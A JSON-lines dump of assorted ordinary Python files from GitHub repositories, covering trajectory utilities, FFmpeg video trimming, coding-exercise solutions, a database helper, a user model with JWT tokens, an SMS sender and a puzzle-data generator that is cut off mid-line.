+{"seq_id":"75022905178","text":"from typing import Tuple\n\nimport numpy as np\n\nfrom argoverse.utils.interpolate import interp_arc\n\nNUM_PTS_PER_TRAJ = 50\n\n\ndef get_polyline_length(polyline: np.ndarray) -> float:\n \"\"\"Calculate the length of a polyline.\n\n Args:\n polyline: Numpy array of shape (N,2)\n\n Returns:\n The length of the polyline as a scalar\n \"\"\"\n assert polyline.shape[1] == 2\n return float(np.linalg.norm(np.diff(polyline, axis=0), axis=1).sum())\n\n\ndef interpolate_polyline_to_ref_density(polyline_to_interp: np.ndarray, ref_polyline: np.ndarray) -> np.ndarray:\n \"\"\"\n Interpolate a polyline so that its density matches the density of a reference polyline.\n\n ::\n\n ref_l2 query_l2\n ---------------- = --------------\n NUM_PTS_PER_TRAJ num_interp_pts\n\n Args:\n polyline_to_interp: Polyline to interpolate -- numpy array of shape (M,2)\n ref_polyline: Reference polyline -- numpy array of shape (N,2)\n\n Returns:\n Interpolated polyline -- numpy array of shape (K,2)\n \"\"\"\n ref_l2 = get_polyline_length(ref_polyline)\n query_l2 = get_polyline_length(polyline_to_interp)\n num_interp_pts = int(query_l2 * NUM_PTS_PER_TRAJ / ref_l2)\n dense_interp_polyline = interp_arc(num_interp_pts, polyline_to_interp[:, 0], polyline_to_interp[:, 1])\n return dense_interp_polyline\n\n\ndef traverse_polyline_by_specific_dist(polyline_to_walk: np.ndarray, l2_dist_to_walk: float) -> Tuple[np.ndarray, bool]:\n \"\"\"\n Walk a distance along a polyline, and return the points along which you walked.\n\n Assumption: polyline is much longer than the distance to walk.\n\n Args:\n polyline_to_walk: Numpy array of shape (N,2)\n l2_dist_to_walk: Distance to traverse\n\n Returns:\n Tuple of (polyline, success flag)\n \"\"\"\n MAX_NUM_PTS_TO_WALK = 100\n dense_polyline_to_walk = interp_arc(MAX_NUM_PTS_TO_WALK, polyline_to_walk[:, 0], polyline_to_walk[:, 1])\n\n for i in range(MAX_NUM_PTS_TO_WALK):\n l2 = get_polyline_length(dense_polyline_to_walk[:i])\n if l2 > l2_dist_to_walk:\n # break from for-loop execution and return\n return dense_polyline_to_walk[:i], True\n\n return dense_polyline_to_walk, False\n","repo_name":"argoverse/argoverse-api","sub_path":"argoverse/utils/polyline_density.py","file_name":"polyline_density.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":760,"dataset":"github-code","pt":"69"}
+{"seq_id":"23454595920","text":"import argparse\nfrom embedding_triples import RDFTriples\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--kbs', type=str, nargs='+', default=['carcinogenesis'], help='Knowledge base name')\n\nfor kb in parser.parse_args().kbs:\n triples = RDFTriples(source_kb_path=f'../datasets/{kb}/{kb}.owl')\n triples.export_triples()","repo_name":"dice-group/NCES2","sub_path":"generators/kb_to_kg.py","file_name":"kb_to_kg.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"26771226040","text":"import math\n\nM = int(input())\nN = int(input())\n\nprimeNumber = [True] * (N+1)\n\nprimeNumber[0] = False\nprimeNumber[1] = False\n\nrootN = math.sqrt(N)\nfor i in range(2,int(rootN)+1):\n j = 2\n if primeNumber:\n while (i*j) <= N:\n primeNumber[i*j] = False\n j += 1\n\n\nminPrime = N+1\nsum = 0\n\nfor index in range(M, N+1):\n if primeNumber[index]:\n sum += index\n minPrime = index if minPrime > index else minPrime\n\nprint(-1 if sum==0 else str(sum)+\"\\n\"+str(minPrime))\n\n","repo_name":"CNU-ANT/2018-Algorithm_Study","sub_path":"180502/2581.py","file_name":"2581.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"28718883003","text":"#210320 mp4SilenceSkipper/SagaUniv SE-Phys 19238032 Kai ISHIZUKA @firestarter2501\n#Install FFmpeg and pass the file path before running it!\n#To be used with appropriate changes to noise, duration, silencedetect, etc.\n\nimport subprocess\nimport os\nimport glob\n\n#Obtaining the original video material\ndef mk_movieList(movie_folder):\n files = os.listdir(movie_folder)\n files = [x for x in files if x[-4:] == '.mp4']\n files = [x for x in files if x[0] != '.']\n return files\n\ndef mk_starts_ends(wk_dir,movie):\n os.chdir(wk_dir)\n output = subprocess.run([\"ffmpeg\",\"-i\",movie,\"-af\", \"silencedetect=noise=-30dB:duration=2\",\"-f\",\"null\",\"-\"], stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n print(output)\n s = str(output)\n lines = s.split('\\\\n')\n time_list = []\n for line in lines:\n if \"silencedetect\" in line:\n words = line.split(\" \")\n for i in range(len(words)):\n if \"silence_start\" in words[i]:\n time_list.append(float((words[i+1]).replace('\\\\r',''))+2)\n if \"silence_end\" in words[i]:\n time_list.append(float((words[i+1]).replace('\\\\r',''))-2)\n\n print(time_list)\n starts_ends = list(zip(*[iter(time_list)]*2))\n return starts_ends\n\ndef mk_jumpcut(wk_dir,movie,starts_ends):\n os.chdir(wk_dir)\n for i in range(len(starts_ends)-1):\n movie_name = movie.split(\".\")\n splitfile = \"./JumpCut/\" + movie_name[0] + \"_\" + str(i) + \".mp4\"\n print(splitfile)\n output = subprocess.run([\"ffmpeg\", \"-i\",movie,\"-ss\",str(starts_ends[i][1]),\"-t\",str(starts_ends[i+1][0]-starts_ends[i][1]),splitfile],stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n print(output)\n\n#Merge videos\ndef join_movie(movie_files,out_path):\n videos = glob.glob(movie_files)\n print(videos)\n\n #List of join targets\n with open(\"JumpCut/tmp.txt\",\"w\") as fp:\n lines = [f\"file '{os.path.split(line)[1]}'\" for line in videos]\n #Prevented from becoming 1,10,11,~, Sorted\n lineList = sorted(lines,key=len)\n fp.write(\"\\n\".join(lineList))\n\n output = subprocess.run([\"ffmpeg\",\"-f\",\"concat\",\"-i\",\"JumpCut/tmp.txt\",\"-c\",\"copy\",out_path],stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n print(output)\n\n#Specifying a directory\nprint(\"Specify the directory of the original video by absolute path. ex. /Users/kishi/Downloads/\")\nmovie_folder = input()\nprint(\"Enter the absolute path of the folder where you want to output the video *.mp4 ex. /Users/kishi/Downloads/*.mp4\")\nmovie_files = input()\nout_path = \"join_out.mp4\"\n\nos.chdir(movie_folder)\nwk_dir = os.path.abspath(\".\")\ntry:\n os.mkdir(\"JumpCut\")\nexcept:\n pass\n\nmovie_list = mk_movieList(movie_folder)\n\nfor movie in movie_list:\n print(movie)\n starts_ends = mk_starts_ends(wk_dir,movie)\n print(starts_ends)\n mk_jumpcut(wk_dir,movie,starts_ends)\n join_movie(movie_files,out_path)\n print(movie_files,out_path)\n","repo_name":"firestarter2501/mp4SilenceSkipper","sub_path":"mp4SilenceSkipper.py","file_name":"mp4SilenceSkipper.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"36305702388","text":"# Q36 「0」と「7」の回文数\n\n# 0 or 7 で構成される数字のジェネレータ\ndef gen_70num():\n num = 1\n while True:\n yield int(bin(num)[2:]) * 7\n num += 1\n\n# num: int, candidates: set(int)\n# candidates のうち、num の因数である数字の集合を返す\ndef search_factors(num, candidates):\n results = set()\n for i in candidates:\n if num % i == 0:\n results.add(i)\n return results\n\ndef main():\n count = 0\n candidates = set(range(1, 51))\n candidates.remove(13)\n results = {} # key: gen_70num で生成された数字, value: key の因数の集合\n for num in gen_70num():\n factors = search_factors(num, candidates)\n results[num] = factors\n candidates -= factors\n count += 1\n if candidates == set() or count > 10000:\n break\n count = 0\n for key in results.keys():\n if str(key) == str(key)[::-1]:\n factors = results[key]\n for num in factors:\n print(\"{:2d} * {:d} = {:d}\".format(num, key // num, key))\n count += 1\n print(\"TOTAL:\", count, \"cases\")\n\nif __name__ == '__main__':\n main()\n","repo_name":"takecap/70puzzles","sub_path":"src/q36_1.py","file_name":"q36_1.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31803823370","text":"import json\nimport tempfile\nfrom pathlib import Path\nfrom unittest.mock import patch\n\nimport pytest\nimport sagemaker\n\nfrom deepcell.cli.modules.cloud.train import CloudKFoldTrainRunner\nfrom deepcell.cloud.ecr import ECRUploader\nfrom deepcell.cloud.train import KFoldTrainingJobRunner\nfrom deepcell.testing.util import get_test_data\n\n\nclass TestTrainCLI:\n @classmethod\n def setup_class(cls):\n data_dir = tempfile.TemporaryDirectory()\n\n cls.dataset = get_test_data(write_dir=data_dir.name, exp_id='0')\n cls.data_dir = data_dir\n\n def teardown_class(self):\n self.data_dir.cleanup()\n\n @patch(\"boto3.session\")\n @patch('docker.APIClient')\n @patch('deepcell.cloud.train.get_sagemaker_execution_role_arn',\n return_value='')\n @patch.object(KFoldTrainingJobRunner,\n '_wait_until_training_jobs_have_finished')\n @patch.object(KFoldTrainingJobRunner, '_upload_local_data_to_s3')\n @patch.object(sagemaker.estimator.Estimator, '__init__', return_value=None)\n @patch.object(sagemaker.estimator.Estimator, 'fit')\n @patch.object(ECRUploader, '_docker_login', return_value=('', ''))\n @pytest.mark.parametrize('local_mode', [True, False])\n def test_cli(self, _, __, ___, ____, _____, ______, _______, ________,\n local_mode):\n \"\"\"Smoke tests the CLI\"\"\"\n instance_type = 'local' if local_mode else 'ml.p3.2xlarge'\n\n with tempfile.TemporaryDirectory() as temp_path:\n with open(Path(temp_path) / 'model_inputs.json', 'w') as f:\n json.dump(self.dataset, f)\n\n with open(Path(temp_path) / 'model_inputs.json', 'r') as f:\n train_params = {\n 'n_folds': 2,\n 'model_inputs_path': f.name,\n 'save_path': temp_path,\n 'optimization_params': {\n 'n_epochs': 3\n }\n }\n\n input_data = {\n 'train_params': train_params,\n 'instance_type': instance_type\n }\n trainer = CloudKFoldTrainRunner(\n input_data=input_data, args=[])\n trainer.run()\n","repo_name":"AllenInstitute/DeepCell","sub_path":"tests/cli/modules/cloud/test_cloud_train_cli.py","file_name":"test_cloud_train_cli.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"1298795654","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfile = 'tmp100'\n\n\ndata = np.loadtxt(file + '.txt')\n\nx = data[:, 0]\ny = data[:, 1]\n\nplt.hist2d(x, y, bins=200, cmap=plt.cm.jet)\n\n\nplt.savefig(file + '.pdf')\n","repo_name":"LouisHurschler/statPhys","sub_path":"exercises/ex06/exe/plot/plot_mueller.py","file_name":"plot_mueller.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72603692699","text":"# 1193 분수찾기\n\nx = int(input())\n\nline = 0 # 해당 줄 번호\nend_index = 0 # 해당 line의 마지막 num의 인덱스번호\n\nwhile end_index < x:\n line += 1\n end_index += line\n\nnum = end_index - line # line=짝수: x와 top의 차, line=홀수: x와 bottom의 차\n\nif line % 2 == 0: # line이 짝수일 때\n top = x - num\n bottom = line - top + 1\nelse: # line이 홀수일 때\n bottom = x - num\n top = line - (bottom) + 1\n\nprint(f\"{top}/{bottom}\")\n","repo_name":"Beanxx/Python-Algorithm","sub_path":"Baekjoon/8. 기본 수학 1/1193.py","file_name":"1193.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"5629448114","text":"# -*- coding:utf-8 -*-\n\n\"\"\"\n--------------------------------------\n @Author :慕凡\n @Date :2021/7/28 11:28\n @Project: py37-学习 \n---------------------------------------\n\"\"\"\nimport pymysql\nimport os\n\nfrom common.myConf import MyConf\nfrom common.my_path import mysql_path\n\n\nclass MyMysql:\n\n def __init__(self):\n # 实例化配置类对象\n conf = MyConf(mysql_path)\n # 1、连接mysql数据库 - 占用数据库资源\n self.db = pymysql.connect(\n user=conf.get(\"mysql\", \"user\"),\n password=conf.get(\"mysql\", \"password\"),\n host=conf.get(\"mysql\", \"host\"),\n database=conf.get(\"mysql\", \"database\"),\n port=conf.getint(\"mysql\", \"port\"),\n charset=\"utf8\",\n cursorclass=pymysql.cursors.DictCursor\n )\n # 2、创建游标\n self.cur = self.db.cursor()\n\n def get_count(self, sql):\n return self.cur.execute(sql)\n\n def get_one_data(self, sql):\n self.cur.execute(sql)\n return self.cur.fetchone()\n\n def get_many_data(self, sql, size=None):\n self.cur.execute(sql)\n if size:\n return self.cur.fetchmany(size)\n else:\n return self.cur.fetchall()\n\n def close_conn(self):\n self.cur.close()\n self.db.close()\n\n def update_data(self):\n # 事务\n # 提交commit 回滚 rollback\n self.cur.execute()\n\n\nif __name__ == '__main__':\n conn = MyMysql()\n num = conn.get_count(\"select * from member where mobile_phone = '18243051705'\")\n print(num)\n conn.close_conn()\n\n","repo_name":"lff1988/day12","sub_path":"common/my_mysql.py","file_name":"my_mysql.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"42004053250","text":"import base64\nimport json\nimport os\nimport secrets\nimport time\nfrom hashlib import md5\nfrom typing import List, Optional\n\nfrom authlib.jose import jwt\nfrom passlib.apps import custom_app_context as pwd_context\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom sqlmodel import Field, Relationship, SQLModel, select\n\nfrom app.config.config import settings\nfrom app.models import Friend\n\n\nclass User(SQLModel, table=True):\n \"\"\"\n User\n \"\"\"\n\n __tablename__ = \"User\"\n id: Optional[int] = Field(default=None, primary_key=True)\n username: str = Field(default=None, index=True, unique=True)\n email: str\n password_hash: str\n salt: str\n about_me: Optional[str] = Field(default=None)\n origin: int\n email_verified: bool = Field(default=False)\n default_avatar: bool = Field(default=True)\n best_score_single_bird: int = Field(default=0)\n best_score_double_bird: int = Field(default=0)\n total_flutters: int = Field(default=0)\n total_pipes_cleared: int = Field(default=0)\n total_games: int = Field(default=0)\n achievements: str = Field(default=\"{}\")\n platform: int = Field(default=0) # 0 = undefined, 1 = web, 2 = IOS/Android, 3 = Both\n\n tokens: List[\"UserToken\"] = Relationship(back_populates=\"user\")\n\n friends: List[\"Friend\"] = Relationship(\n back_populates=\"friend\",\n sa_relationship_kwargs={\n \"primaryjoin\": \"User.id==Friend.user_id\",\n },\n )\n followers: List[\"Friend\"] = Relationship(\n back_populates=\"follower\",\n sa_relationship_kwargs={\n \"primaryjoin\": \"User.id==Friend.friend_id\",\n },\n )\n\n def hash_password(self, password):\n salt = secrets.token_hex(8)\n self.salt = salt\n self.password_hash = pwd_context.hash(password + salt)\n\n def verify_password(self, password):\n # If the user has any other origin than regular it should not get here\n # because the verification is does elsewhere. So if it does, we return False\n if self.origin != 0:\n return False\n else:\n return pwd_context.verify(password + self.salt, self.password_hash)\n\n def befriend(self, user):\n # Only call if the Friend object is not present yet.\n friend = Friend(user_id=self.id, friend_id=user.id, friend_name=user.username)\n return friend\n\n async def is_friend(self, db: AsyncSession, user):\n if user:\n friend_statement = select(Friend).filter_by(user_id=self.id, friend_id=user.id)\n results = await db.execute(friend_statement)\n friend = results.first()\n if friend:\n return friend.Friend.accepted\n else:\n return False\n else:\n return False\n\n def generate_auth_token(self, expires_in=1800):\n # also used for email password reset token\n payload = {\n \"id\": self.id,\n \"iss\": settings.JWT_ISS,\n \"aud\": settings.JWT_AUD,\n \"sub\": settings.JWT_SUB,\n \"exp\": int(time.time()) + expires_in, # expiration time\n \"iat\": int(time.time()), # issued at\n }\n return jwt.encode(settings.header, payload, settings.jwk)\n\n def logged_in_web(self):\n # If the user has played on mobile this variable will be 2.\n # Now the user is on web, so we set it to 3. Which is the final state.\n if self.platform == 2:\n self.platform = 3\n return 2\n # If the value is undefined we set the variable to 1, which is web.\n elif self.platform == 0:\n self.platform = 1\n return 1\n return 0\n\n def logged_in_mobile(self):\n # If the user has played on web this variable will be 1.\n # Now the user is on mobile, so we set it to 3. Which is the final state.\n if self.platform == 1:\n self.platform = 3\n return 2\n # If the value is undefined we set the variable to 2, which is mobile.\n elif self.platform == 0:\n self.platform = 2\n return 1\n return 0\n\n def generate_refresh_token(self, expires_in=345600):\n payload = {\n \"user_name\": self.username,\n \"iss\": settings.JWT_ISS,\n \"aud\": settings.JWT_AUD,\n \"sub\": settings.JWT_SUB,\n \"exp\": int(time.time()) + expires_in, # expiration time\n \"iat\": int(time.time()), # issued at\n }\n return jwt.encode(settings.header, payload, settings.jwk)\n\n def is_verified(self):\n return self.email_verified\n\n def verify_user(self):\n self.email_verified = True\n\n def avatar_filename(self):\n return md5(self.email.lower().encode(\"utf-8\")).hexdigest()\n\n def avatar_filename_small(self):\n return self.avatar_filename() + \"_small\"\n\n def avatar_filename_default(self):\n return self.avatar_filename() + \"_default\"\n\n def set_new_username(self, new_username):\n self.username = new_username\n\n def set_default_avatar(self, value):\n self.default_avatar = value\n\n def is_default(self):\n return self.default_avatar\n\n def get_user_avatar(self, full=False):\n if self.default_avatar:\n file_name = self.avatar_filename_default()\n else:\n if full:\n file_name = self.avatar_filename()\n else:\n file_name = self.avatar_filename_small()\n file_folder = settings.UPLOAD_FOLDER_AVATARS\n\n file_path = os.path.join(file_folder, \"%s.png\" % file_name)\n if not os.path.isfile(file_path):\n return None\n else:\n with open(file_path, \"rb\") as fd:\n image_as_base64 = base64.encodebytes(fd.read()).decode()\n return image_as_base64\n\n def get_friend_ids(self):\n return [friend.serialize_minimal for friend in self.friends]\n\n @property\n def serialize(self):\n # Get detailed user information, mostly used for login\n return {\n \"id\": self.id,\n \"username\": self.username,\n \"verified\": self.email_verified,\n \"friends\": self.get_friend_ids(),\n \"avatar\": self.get_user_avatar(True),\n \"score\": {\n \"total_flutters\": self.total_flutters,\n \"total_pipes_cleared\": self.total_pipes_cleared,\n \"total_games\": self.total_games,\n \"best_score_single_bird\": self.best_score_single_bird,\n \"best_score_double_bird\": self.best_score_double_bird,\n },\n \"achievements\": json.loads(self.achievements),\n }\n\n @property\n def serialize_get(self):\n # get user details without personal information\n return {\n \"id\": self.id,\n \"username\": self.username,\n \"avatar\": self.get_user_avatar(True),\n \"score\": {\n \"total_flutters\": self.total_flutters,\n \"total_pipes_cleared\": self.total_pipes_cleared,\n \"total_games\": self.total_games,\n \"best_score_single_bird\": self.best_score_single_bird,\n \"best_score_double_bird\": self.best_score_double_bird,\n },\n \"achievements\": json.loads(self.achievements),\n }\n\n @property\n def serialize_minimal(self):\n # get minimal user details\n return {\n \"id\": self.id,\n \"username\": self.username,\n \"avatar\": self.get_user_avatar(False),\n }\n\n @property\n def serialize_no_detail(self):\n # used after account creation before there is an avatar and when all the scores are 0\n return {\n \"id\": self.id,\n \"username\": self.username,\n \"score\": {\n \"total_flutters\": 0,\n \"total_pipes_cleared\": 0,\n \"total_games\": 0,\n \"best_score_single_bird\": 0,\n \"best_score_double_bird\": 0,\n },\n \"achievements\": {},\n }\n","repo_name":"Grabot/flutterbird_backend","sub_path":"app/app/models/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":8021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"27470741829","text":"\nimport numpy as np \n\nX= np.array([0,1,2,3,4])\ny= np.array([1,3,7,13,21])\n\n\n# initialize parameters and keep w0 constant \n# we want to visualise RSS with respect to one dimension of parameter \n# for 2 dimension that is for both w0 and w1, RSS will become like mesh grid\nw0=0.\nw1=-40.\n\nRSS= {} # keys will be RSS and values will be w1 i.e. slope\nepochs= 50\nw1steps=2.\nfor epoch in range (epochs):\n SumSqErrors = 0\n for i in range(len(X)): # to loop over all data points to calculate sum of square of error\n y_predicted = w0 + w1 * X[i]\n error= y[i] - y_predicted\n SqError= error**2\n SumSqErrors += SqError\n # add this Error sq sum as key and corresponding parameters (w0,w1) as values\n RSS[SumSqErrors] = w1\n # chnage w1\n w1= w1 + w1steps\n\nimport matplotlib.pyplot as plt \n\nplt.scatter(RSS.values(),RSS.keys())\nplt.xlabel('w1')\nplt.ylabel('RSS value')\nplt.show()\n\nprint(RSS.keys())","repo_name":"Omnish22/Machine_Learning","sub_path":"2_MinRSS.py","file_name":"2_MinRSS.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"25853381971","text":"# Download the helper library from https://www.twilio.com/docs/python/install\r\ndef send_sms(body, sender, to):\r\n from twilio.rest import Client\r\n\r\n\r\n # Your Account Sid and Auth Token from twilio.com/console\r\n # and set the environment variables. See http://twil.io/secure\r\n account_sid = ''\r\n auth_token = ''\r\n client = Client(account_sid, auth_token)\r\n\r\n message = client.messages \\\r\n .create(\r\n body=body,\r\n from_=sender,\r\n to=to\r\n )\r\n\r\n\r\nif __name__ == \"__main__\":\r\n send_sms(body, sender, to)\r\n","repo_name":"carey5/BestBuyCA_Item_Avail","sub_path":"send_sms.py","file_name":"send_sms.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"20637770561","text":"#w grupie poniedziałkowej numpy było niepotrzebne, ale lepiej użyć.\nimport numpy as np\nfrom Grafy1Funkcje import *\nfrom random import seed\n\nvertices = [\"a\", \"b\", \"c\", \"d\", \"e\"]\nmatrix = np.array([[0,1,1,0,0],[0,0,1,0,0],[0,0,0,1,1],[0,0,0,0,1],[0,0,0,0,0]])\n#poniedziałkowa: matrix = [[0,1,1,0,0],[0,0,1,0,0],[0,0,0,1,1],[0,0,0,0,1],[0,0,0,0,0]]\n#aktualne rozwiązanie powinno być lepsze\n\nprint(matrix) # wypisuje macierz\nprint_matrix(vertices,matrix) #wypisuje graf z nazwami wierzchołków\nprint_matrix([],matrix) #wypisuje graf nazywając wierzchołki liczbami 1,2,...n\nprint(\"\")\n\n#graf w formie słownika/listy sąsiedztwa - będziemy tę formę preferować.\ngraph = {'A': ['B', 'C'],\n 'B': ['C', 'D'],\n 'C': ['D'],\n 'D': ['C'],\n 'E': ['F'],\n 'F': ['C']}\nprint(graph)\nprint_graph(graph)\nprint(\"\")\n\n#graf w formie słownika tworzony od podstaw, krok po kroku\ngraph = {}\nadd_arc(graph, (\"a\", \"b\"))\nadd_arc(graph, (\"a\", \"c\"))\nadd_arc(graph, (\"b\", \"c\"))\nadd_arc(graph, (\"c\", \"d\"))\nadd_vertex(graph, \"e\")\nprint_graph(graph)\nprint(\"\")\n\n#graf losowy - wykorzystanie funkcji\n#ustawienie tzw. ziarna generatora liczb losowych\n#dzięki temu wyniki są powtarzalne (można wstawić inną liczbę)\n#brak użycie seed() - wyniki będą nie do powtórzenia\nseed(2019)\nrandom_graph = random_graph(10, 1/5)\nprint_graph(random_graph)\nprint(\"\")\n\n#graf skierowny z pliku lista.txt (lista łuków)\ngraph = graph_from_edges(\"lista.txt\", 1)\nprint_graph(graph)\n\n#zapisany do pliku graf.txt (lista sąsiadów)\ngraph_to_neighbourslist(graph, \"graf.txt\")\n\n#wczytany z pliku graf.txt (lista sąsiedów) jako graf nieskierowany\nprint_graph(graph_from_neighbourslist(\"graf.txt\"))","repo_name":"kazzzz65/GrafyLab","sub_path":"Grafylab/venv/Grafy1Test.py","file_name":"Grafy1Test.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"8823320201","text":"#!/usr/bin/env python3\n\nimport random\nimport sys\nfrom subprocess import getoutput\n\nprenoms = ['Abdallah', 'Abdel', 'Adelaide', 'Adrien', 'Agnes', 'Alaric',\n 'Ali', 'Ali', 'Alienor', 'Alix', 'Alphonse', 'Alphonse', 'Alwin',\n 'Amaury', 'Amedee', 'Amin', 'Amina', 'Anastase', 'Anastase',\n 'Anastasie', 'Anastasie', 'Ariane', 'Arnaud', 'Arnaut', 'Arthur',\n 'Arthur', 'Astrid', 'Aubin', 'Aude', 'Aude', 'Audoin', 'Augustin',\n 'Aure', 'Avit', 'Avit', 'Aymar', 'Bathilde', 'Bathilde', 'Baudoin',\n 'Baudry', 'Beatrice', 'Beatrice', 'Benedicte', 'Benedicte',\n 'Benoit', 'Berenger', 'Bernard', 'Bernard', 'Berthe', 'Berthe',\n 'Bertille', 'Bertille', 'Bertrand', 'Bertrand', 'Bilal', 'Blanche',\n 'Blanche', 'Boniface', 'Boniface', 'Brice', 'Brunhild', 'Cassius',\n 'Catherine', 'Catherine', 'Charles', 'Charles', 'Childebert',\n 'Clodomir', 'Clotaire', 'Clotaire', 'Clotilde', 'Clotilde', 'Cloud',\n 'Cloud', 'Clovis', 'Colin', 'Colomban', 'Colombe', 'Colombe',\n 'Constance', 'Constance', 'Constantin', 'Crepin', 'Cyrielle',\n 'Dagobert', 'Didier', 'Djafar', 'Domitille', 'Edouard', 'Edouard',\n 'Edwin', 'Elisabeth', 'Elizabeth', 'Eloi', 'Eloi', 'Eloise',\n 'Elvira', 'Emeline', 'Emeline', 'Emma', 'Engueran', 'Enguerrand',\n 'Eric', 'Ermeline', 'Etienne', 'Etienne', 'Eudes', 'Eudes',\n 'Eulalie', 'Eulalie', 'Evrard', 'Fatima', 'Fatima', 'Ferdinand',\n 'Fernand', 'Fernande', 'Fiacre', 'Fiacre', 'Firmin', 'Firmin',\n 'Flavien', 'Flavien', 'Florentin', 'Florentin', 'Foulques',\n 'Frederic', 'Frederic', 'Fulbert', 'Garcia', 'Gaspard', 'Gaston',\n 'Gaston', 'Gaultier', 'Gauthier', 'Gautier', 'Gauvin', 'Genevieve',\n 'Geoffroy', 'Geoffroy', 'Gerald', 'Germain', 'Germain', 'Gertrude',\n 'Gertrude', 'Gilbert', 'Gilbert', 'Gildas', 'Gildas', 'Gisele',\n 'Goery', 'Gontran', 'Gontran', 'Gregoire', 'Gregoire', 'Guenievre',\n 'Guillaume', 'Guillaume', 'Guy', 'Gysele', 'Hadi', 'Hafsa',\n 'Halima', 'Haroun', 'Hassan', 'Heloïse', 'Hermance', 'Hermine',\n 'Hildegarde', 'Hisham', 'Hubert', 'Hubert', 'Hugues', 'Hugues',\n 'Hussein', 'Ida', 'Idriss', 'Irene', 'Isaac', 'Isabel', 'Isabelle',\n 'Iseult', 'Isidore', 'Jean', 'Jeanne', 'Jeanne', 'Jehanne',\n 'Jimena', 'Joséphine', 'Julien', 'Justin', 'Justine', 'Justinien',\n 'Khadidja', 'Lancelot', 'Louis', 'Louis', 'Louise', 'Lubin',\n 'Mahaut', 'Malvina', 'Mansour', 'Marcus', 'Margaux', 'Margaux',\n 'Margot', 'Margot', 'Marguerite', 'Maria', 'Maria', 'Mathilde',\n 'Mathilde', 'Maurice', 'Maurice', 'Maurin', 'Melusine', 'Merlin',\n 'Morgane', 'Musa', 'Nestor', 'Norbert', 'Ode', 'Ode', 'Odeline',\n 'Odile', 'Odile', 'Odilon', 'Ogier', 'Olivier', 'Omar', 'Omer',\n 'Omer', 'Oswald', 'Pacome', 'Pacome', 'Paul', 'Paulin', 'Paulin',\n 'Penda', 'Pepin', 'Pepin', 'Perceval', 'Petrus', 'Philibert',\n 'Philibert', 'Philippe', 'Philippe', 'Pierre', 'Pierre', 'Pierrick',\n 'Radegonde', 'Raoul', 'Raoul', 'Raymond', 'Remi', 'Renaud',\n 'Richard', 'Robert', 'Robert', 'Robin', 'Robin', 'Roger', 'Roland',\n 'Roland', 'Romain', 'Romaric', 'Samson', 'Sawda', 'Sebastien',\n 'Sigismond', 'Stanislas', 'Sylvia', 'Tancrede', 'Tanguy', 'Tarik',\n 'Tariq', 'Tassilo', 'Theodore', 'Thibaud', 'Thibert', 'Thierry',\n 'Thierry', 'Tiphaine', 'Tiphaine', 'Tristan', 'Ulric', 'Ulrich',\n 'Urbain', 'Ursula', 'Ursule', 'Venance', 'Venance', 'Veneranda',\n 'Victoire', 'Vincent', 'Vincent', 'Virgile', 'Waldo', 'Wilfrid',\n 'Wilfried', 'William', 'Yazid', 'Zacharia', 'Zacharie']\n\nnoms = ['fils de Martin', 'Langlois', 'Anglais', 'Duchesne', 'du Chêne',\n 'Marchand', 'Boulanger', 'le Chauve', 'Courtois', 'Ageorges',\n 'Aubernard', 'Alamartine', 'le fils à Georges', 'le fils au Bernard',\n 'Fromentin', 'Rabier', 'Coulomb', 'Coulon', 'Cabrera', 'Poudevigne',\n 'Messonnier', 'Métivier', 'Pelletier', 'Larsonneur', 'Legros',\n 'Lenain', 'Sarrazin', 'Chauvin', 'Roux']\n\nobjets = ['une pelle', 'un pic', 'une besace', 'une pomme', 'une poule', 'un cheval',\n 'une vache', 'une chèvre', 'un chacal', 'un sac de blé', 'un rubis',\n \"un savon\", \"une balle de cuir\", \"une couverture\", \"un caillou brillant\",\n 'une opale', 'un bâton de marche', 'une besace', 'un tabouret', 'une épingle',\n 'une ceinture', 'un heaume']\n\n\ndef gen(nbLignes, nbDuRoi, probaPaye):\n detteDuDuc = 0\n nbImpayes = 0\n L = []\n for i in range(random.randint(int(nbLignes*0.9), int(nbLignes*1.1))):\n nom = random.choice(prenoms) + ' ' + random.choice(noms)\n objet = random.choice(objets)\n prix = random.randint(2, 5)\n\n if random.random() <= probaPaye:\n finale = ' -- PAYÉ.'\n paye = True\n else:\n finale = '.'\n paye = False\n nbImpayes += 1\n\n if i == 0 or random.randint(1, n) <= nbDuRoi:\n nom = \"Le Duc\"\n if not paye:\n detteDuDuc += prix\n L.append(\"{} m'a acheté {} pour {} piécettes{}\".format(nom, objet, prix, finale))\n print('\\n'.join(L))\n getoutput(\"echo -n {} | 